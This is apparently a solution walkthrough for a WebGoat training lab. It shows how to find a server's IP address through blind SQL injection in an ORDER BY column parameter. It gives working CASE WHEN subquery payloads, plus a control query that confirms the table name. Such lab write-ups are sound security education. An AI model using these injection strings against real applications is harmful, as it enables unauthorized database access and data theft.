SQL Injection Mitigation (10)
In this assignment try to perform an SQL injection through the ORDER BY field. Try to find the ip address of the webgoat-prd
server, guessing the complete ip address might take too long so we give you the last part: xxx.130.219.202
Note: The submit field of this assignment is NOT vulnerable for an SQL injection.
Solution
⚠️ Buggy lesson with the last version, a call to http://localhost:8080/WebGoat/SqlInjection/servers sends back an error.
💡 Try sorting and look at the request 💡 Intercept the request and try to specify a different order by 💡 Use for example "(case when (true) then hostname else id end)" in the order by and see what happens
Click on column sort performs a request to http://localhost:8080/WebGoat/SqlInjection/servers?column=ip. This can be exploited by intercepting the request with Browser Tools and providing prepared string as column value.
To get the idea about webgoat-prd IP address we first have to find out the table name and ip column name. The obvious guess is servers and ip:
column=(CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-acc') = '192.168.3.3' THEN id ELSE hostname END)
If that is the correct table and column name, the table will get sorted by ids.
So after intercepting and changing the request we get the table sorted by ids, the guess was correct.
Just to check our logic, lets send request with:
column=(CASE WHEN (SELECT ip FROM whatever WHERE hostname='webgoat-acc') = '192.168.3.3' THEN id ELSE hostname END)
It get's an error page, we have everything to script the attack now.
Last updated